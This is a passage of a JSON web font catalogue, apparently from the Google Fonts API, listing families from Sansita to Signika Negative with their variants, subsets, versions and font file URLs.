\"http://fonts.gstatic.com/s/sansita/v10/QldLNTRRphEb_-V7JKWUaXl0wqVv3_g.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sansita/v10/QldJNTRRphEb_-V7LBuJ9Xx-xodqz_joDQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sansita/v10/QldLNTRRphEb_-V7JLmXaXl0wqVv3_g.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sansita/v10/QldJNTRRphEb_-V7LBuJ6X9-xodqz_joDQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sansita/v10/QldLNTRRphEb_-V7JJ2WaXl0wqVv3_g.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sansita/v10/QldJNTRRphEb_-V7LBuJzX5-xodqz_joDQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sansita Swashed\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW-ppbToVehmEa4Q.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW7RpbToVehmEa4Q.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW4ZpbToVehmEa4Q.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW2pubToVehmEa4Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW1NubToVehmEa4Q.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSWzRubToVehmEa4Q.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSWx1ubToVehmEa4Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sarabun\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVhJx26TKEr37c9YHZJmnYI5gnOpg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVnJx26TKEr37c9aBBx_nwMxAzephhN.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YNpoulwm6gDXvwE.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxUl0s7iLSrwFUlw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YL5rulwm6gDXvwE.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxNl4s7iLSrwFUlw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVjJx26TKEr37c9WBJDnlQN9gk.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVhJx26TKEr37c9aBBJmnYI5gnOpg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YOZqulwm6gDXvwE.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxbl8s7iLSrwFUlw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YMptulwm6gDXvwE.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxQlgs7iLSrwFUlw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YK5sulwm6gDXvwE.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxJlks7iLSrwFUlw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YLJvulwm6gDXvwE.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxOlos7iLSrwFUlw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sarala\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sarala/v10/uK_y4riEZv4o1w9RCh0TMv6EXw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sarala/v10/uK_x4riEZv4o1w9ptjI3OtWYVkMpXA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sarina\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sarina/v21/-F6wfjF3ITQwasLhLkDUriBQxw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sarpanch\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sarpanch/v11/hESy6Xt4NCpRuk6Pzh2ARIrX_20n.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziV0ba7f1HEuRHkM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziVYaq7f1HEuRHkM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziU8a67f1HEuRHkM.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziUgaK7f1HEuRHkM.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziUEaa7f1HEuRHkM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sassy Frass\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sassyfrass/v5/LhWhMVrGOe0FLb97BjhsE99dGNWQg_am.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Satisfy\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/satisfy/v17/rP2Hp2yn6lkG50LoOZSCHBeHFl0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sawarabi Gothic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sawarabigothic/v12/x3d4ckfVaqqa-BEj-I9mE65u3k3NBSk3E2YljQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sawarabi Mincho\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sawarabimincho/v17/8QIRdiDaitzr7brc8ahpxt6GcIJTLahP46UDUw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Scada\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/scada/v14/RLpxK5Pv5qumeWJoxzUobkvv.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/scada/v14/RLp_K5Pv5qumeVJqzTEKa1vvffg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/scada/v14/RLp8K5Pv5qumeVrU6BEgRVfmZOE5.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/scada/v14/RLp6K5Pv5qumeVJq9Y0lT1PEYfE5p6g.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Scheherazade New\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/scheherazadenew/v14/4UaZrFhTvxVnHDvUkUiHg8jprP4DCwNsOl4p5Is.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/scheherazadenew/v14/4UaerFhTvxVnHDvUkUiHg8jprP4DM79DHlYC-IKnoSE.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Schoolbell\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/schoolbell/v18/92zQtBZWOrcgoe-fgnJIVxIQ6mRqfiQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Scope One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/scopeone/v14/WBLnrEXKYFlGHrOKmGD1W0_MJMGxiQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Seaweed Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/seaweedscript/v13/bx6cNx6Tne2pxOATYE8C_Rsoe0WJ-KcGVbLW.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Secular One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/secularone/v11/8QINdiTajsj_87rMuMdKypDlMul7LJpK.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sedgwick Ave\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sedgwickave/v12/uK_04rKEYuguzAcSYRdWTJq8Xmg1Vcf5JA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sedgwick Ave Display\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sedgwickavedisplay/v19/xfuu0XPgU3jZPUoUo3ScvmPi-NapQ8OxM2czd-YnOzUD.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sen\",\n      \"variants\": [\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sen/v7/6xKjdSxYI9_Hm_-MImrpLQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sen/v7/6xKudSxYI9__J9CoKkH1JHUQSQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sen/v7/6xKudSxYI9__O9OoKkH1JHUQSQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Send Flowers\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sendflowers/v2/If2PXTjtZS-0Xqy13uCQSULvxwjjouU1iw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sevillana\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sevillana/v21/KFOlCnWFscmDt1Bfiy1vAx05IsDqlA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Seymour One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/seymourone/v20/4iCp6Khla9xbjQpoWGGd0myIPYBvgpUI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shadows Into Light\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shadowsintolight/v15/UqyNK9UOIntux_czAvDQx_ZcHqZXBNQDcsr4xzSMYA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shadows Into Light Two\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shadowsintolighttwo/v13/4iC86LVlZsRSjQhpWGedwyOoW-0A6_kpsyNmlAvNGLNnIF0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shalimar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shalimar/v5/uU9MCBoE6I6iNWFUvTPx8PCOg0uX.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shanti\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shanti/v23/t5thIREMM4uSDgzgU0ezpKfwzA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Share\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/share/v16/i7dEIFliZjKNF5VNHLq2cV5d.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/share/v16/i7dKIFliZjKNF6VPFr6UdE5dWFM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/share/v16/i7dJIFliZjKNF63xM56-WkJUQUq7.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/share/v16/i7dPIFliZjKNF6VPLgK7UEZ2RFq7AwU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Share Tech\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sharetech/v17/7cHtv4Uyi5K0OeZ7bohUwHoDmTcibrA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Share Tech Mono\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sharetechmono/v15/J7aHnp1uDWRBEqV98dVQztYldFc7pAsEIc3Xew.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shippori Antique\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shipporiantique/v8/-F6qfid3KC8pdMyzR0qRyFUht11v8ldPg-IUDNg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shippori Antique B1\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shipporiantiqueb1/v8/2Eb7L_JwClR7Zl_UAKZ0mUHw3oMKd40grRFCj9-5Y8Y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shippori Mincho\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shipporimincho/v14/VdGGAZweH5EbgHY6YExcZfDoj0BA2_-C7LoS7g.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4L9am5JEO5--2zg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4A9Gm5JEO5--2zg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4Z9Cm5JEO5--2zg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/shipporimincho/v14/VdGDAZweH5EbgHY6YExcZfDoj0B4e9Om5JEO5--2zg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shippori Mincho B1\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChQKElNoaXBwb3JpIE1pbmNobyBCMSAAKgQIARgB.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRj0AyAAKgQIARgB.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRjYBCAAKgQIARgB.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRi8BSAAKgQIARgB.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/shipporiminchob1/v19/~ChcKElNoaXBwb3JpIE1pbmNobyBCMRigBiAAKgQIARgB.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shojumaru\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shojumaru/v15/rax_HiWfutkLLnaKCtlMBBJek0vA8A.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Short Stack\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shortstack/v15/bMrzmS2X6p0jZC6EcmPFX-SScX8D0nq6.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Shrikhand\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/shrikhand/v11/a8IbNovtLWfR7T7bMJwbBIiQ0zhMtA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Siemreap\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/siemreap/v24/Gg82N5oFbgLvHAfNl2YbnA8DLXpe.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sigmar One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sigmarone/v16/co3DmWZ8kjZuErj9Ta3dk6Pjp3Di8U0.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Signika\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tIJHJbGhs_cfKe1.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tJXHJbGhs_cfKe1.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tJlHJbGhs_cfKe1.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tKJG5bGhs_cfKe1.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/signika/v20/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tKwG5bGhs_cfKe1.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Signika Negative\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAr5S73st9hiuEq8.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAqnS73st9hiuEq8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAqVS73st9hiuEq8.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RAp5TL3st9hiuEq8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/signikanegative/v20/E21x_cfngu7HiRpPX3ZpNE4kY5zKSPmJXkF0VDD2RApATL3st9hiuEq8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Silkscreen\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/silkscreen/v1/m8JXjfVPf62XiF7kO-i9ULRvamODxdI.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/silkscreen/v1/m8JUjfVPf62XiF7kO-i9aAhATmuo2dudFvc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Simonetta\",\n      